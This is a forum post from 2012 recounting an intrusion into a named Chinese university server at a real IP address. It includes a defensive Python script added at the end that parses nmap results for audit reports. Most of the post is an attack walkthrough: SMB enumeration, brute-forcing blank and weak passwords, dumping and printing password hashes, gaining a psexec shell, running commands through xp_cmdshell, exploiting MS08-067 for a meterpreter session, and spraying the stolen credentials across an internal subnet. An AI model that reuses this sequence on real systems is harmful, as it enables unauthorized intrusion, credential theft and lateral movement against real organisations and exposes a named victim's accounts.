nmap + msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to scan for the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // in msf, use the ms08-067 vulnerability to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging on to the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
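Read from the system owner's side, the NSE output in the post is a short fix list: anonymous access on IPC$, a blank administrator password, a guessable password on test, and a missing MS08-067 patch. As an added example that is not part of the original post, the Python script below parses nmap normal output of that shape (the smb-enum-shares, smb-brute and smb-check-vulns blocks shown above) and turns it into ranked findings for an authorized audit report. The sample input is constructed on RFC 5737 documentation addresses, not captured from the host in the post, and the severity rules are my own choices, not nmap's.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample in the shape of the post's nmap output, on RFC 5737
# documentation addresses; it is not output captured from the host in the post.
SAMPLE_SCAN = """\
Nmap scan report for lab-w2k (192.0.2.10)
Host is up (0.00035s latency).
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap scan report for 192.0.2.11
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp closed ms-term-serv

Nmap done: 2 IP addresses (2 hosts up) scanned in 2.05 seconds
"""


@dataclass
class Finding:
    host: str
    severity: str  # critical / high / medium / info (my own ranking)
    source: str    # NSE script name, or "ports"
    detail: str


SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "info": 3}

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+(\w+)\s+(\S+)")
SCRIPT_HDR_RE = re.compile(r"^\|_?\s(?=\S)([\w-]+):\s*$")  # e.g. "| smb-brute:"
SHARE_RE = re.compile(r"^\|_?\s+(\S+)\s*$")                  # e.g. "|   IPC$"
ANON_RE = re.compile(r"^\|_?\s+Anonymous access:\s*(\S+)")
LOGIN_RE = re.compile(r"^\|_?\s+([^:\s]+):(\S+)\s+=>\s+Login was successful")
VULN_RE = re.compile(r"^\|_?\s+(\S+):\s+VULNERABLE\b")


def parse_scan(text: str) -> Dict[str, dict]:
    """Split nmap normal output into per-host records of open ports and NSE script lines."""
    hosts: Dict[str, dict] = {}
    current, script = None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:  # a new host block; keyed by IP whether or not a hostname is shown
            current = hosts.setdefault(m.group(1), {"ports": {}, "scripts": {}})
            script = None
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            port, state, service = m.groups()
            if state == "open":
                current["ports"][int(port)] = service
            continue
        m = SCRIPT_HDR_RE.match(line)
        if m:
            script = m.group(1)
            current["scripts"][script] = []
        elif script is not None and line.startswith("|"):
            current["scripts"][script].append(line)
        else:
            script = None  # any non-script line ends the current script block
    return hosts


def triage(hosts: Dict[str, dict]) -> List[Finding]:
    """Turn parsed results into ranked findings for the host's owner."""
    out: List[Finding] = []
    for host, rec in hosts.items():
        ports, scripts = rec["ports"], rec["scripts"]
        if 445 in ports or 139 in ports:
            out.append(Finding(host, "info", "ports", "SMB reachable from the scanner's network"))
        if 3389 in ports:
            out.append(Finding(host, "info", "ports", "RDP reachable from the scanner's network"))
        share = None  # smb-enum-shares lists a share name, then its access level on the next line
        for line in scripts.get("smb-enum-shares", []):
            m = ANON_RE.match(line)
            if m:
                if share and m.group(1) != "<none>":
                    out.append(Finding(host, "medium", "smb-enum-shares",
                                       f"share {share} allows anonymous {m.group(1)} access"))
                continue
            m = SHARE_RE.match(line)
            if m:
                share = m.group(1)
        for line in scripts.get("smb-brute", []):
            m = LOGIN_RE.match(line)
            if m:
                user, secret = m.groups()
                blank = secret == "<blank>"
                out.append(Finding(host, "critical" if blank else "high", "smb-brute",
                                   f"account {user} has a {'blank' if blank else 'guessable'} password"))
        for line in scripts.get("smb-check-vulns", []):
            m = VULN_RE.match(line)
            if m:
                out.append(Finding(host, "critical", "smb-check-vulns",
                                   f"{m.group(1)} reported VULNERABLE; the patch is missing"))
    out.sort(key=lambda f: (SEVERITY_RANK[f.severity], f.host))
    return out


if __name__ == "__main__":
    for f in triage(parse_scan(SAMPLE_SCAN)):
        print(f"[{f.severity:8}] {f.host:<12} {f.source}: {f.detail}")
```

Run it directly to print the constructed sample's findings ordered by severity, or call `parse_scan` on the text of a real `nmap -oN` file to triage an actual audit. The smb-check-vulns and smb-brute scripts used in the post belong to Nmap 5.x; later releases replaced smb-check-vulns with per-vulnerability smb-vuln-* scripts whose output is laid out differently, so the script-specific regexes would need adjusting for them.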